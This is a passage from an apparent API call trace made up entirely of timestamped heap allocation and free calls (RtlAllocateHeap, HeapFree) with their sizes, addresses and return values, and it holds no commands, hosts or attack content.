(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6420 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af63f0 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af64b0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa) returned 0x2af6450 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63f0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66f0 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af63f0 | out: hHeap=0x2af0000) returned 1 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66f0 | out: hHeap=0x2af0000) returned 1 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6450 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af64e0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2af63f0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62d0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66e0 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af62d0 | out: hHeap=0x2af0000) returned 1 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66e0 | out: hHeap=0x2af0000) returned 1 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af63f0 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af62d0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af66a0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6240 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63f0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6640 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66a0 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2afa0d8 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa0b0 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6438 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6450 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6240 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6288 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2afa120 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6480 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af64c8 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6240 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6258 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa2d0 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa1e0 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa3d8 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa1b0 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa468 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa438 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa3c0 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa360 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6510 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6330 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6498 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af63d8 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6420 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6408 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af64b0 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af64e0 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af62d0 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6450 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6438 | out: hHeap=0x2af0000) returned 1 [0080.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6288 | out: hHeap=0x2af0000) returned 1 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x2afa558 [0080.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa0b0 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa5b0 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67c0 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa288 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa3f0 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa0b0 | out: hHeap=0x2af0000) returned 1 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa558 | out: hHeap=0x2af0000) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa240 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa408 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa420 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa240 | out: hHeap=0x2af0000) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2afa390 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa348 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66a0 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa348 | out: hHeap=0x2af0000) returned 1 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66a0 | out: hHeap=0x2af0000) returned 1 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa390 | out: hHeap=0x2af0000) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa180 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa1f8 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa0b0 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66a0 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa210 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa3a8 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa1f8 | out: hHeap=0x2af0000) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa240 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa258 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa558 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67d0 [0080.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa450 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa198 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa258 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa1c8 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af66e0 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa2a0 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa2e8 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67e0 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66e0 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa2b8 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa300 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa2a0 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa318 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa1f8 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa348 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa228 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa258 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa270 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa580 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66b0 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa330 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa2a0 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa270 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa378 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa270 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa5d8 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6650 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa390 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa4c8 [0080.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa270 | out: hHeap=0x2af0000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa270 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af6670 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa528 [0080.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa4e0 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66c0 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6670 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa540 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa480 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa528 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2afa600 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa0d8 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa498 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa4b0 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa510 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa4f8 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa528 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62d0 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa0d8 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6780 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6408 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6498 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af62d0 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6420 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af64b0 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa688 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6750 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af64e0 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63d8 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af64b0 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6438 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af6670 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6510 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6450 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66e0 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6670 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af64b0 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62d0 [0080.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6510 | out: hHeap=0x2af0000) returned 1 [0080.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6510 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6288 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6330 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa878 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa890 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa9b0 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afaab8 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6670 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa7d0 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa830 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa9b0 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100) returned 0x2afaae0 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa600 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa7b8 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa740 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa600 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66f0 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa8a8 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa758 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa740 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa980 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af6700 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa9c8 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa8d8 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6760 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6700 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa6e0 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa770 [0080.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa9c8 | out: hHeap=0x2af0000) returned 1 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa7e8 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa788 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa968 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa950 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa740 [0080.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa9b0 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afae18 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6700 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa7a0 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa800 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa9b0 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa8f0 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa908 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afad28 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6790 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa710 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa998 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa908 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa9b0 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af6930 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa6f8 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa8c0 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6980 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6930 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa848 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa728 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa6f8 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa818 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa9c8 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa938 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa860 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa908 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa920 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afae40 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6850 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa6f8 [0080.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afaa40 [0080.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa920 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa920 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afaa88 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afad50 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6870 [0080.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afa9e0 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afa9f8 [0080.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afaa88 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afaa88 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af68a0 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afaa10 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, 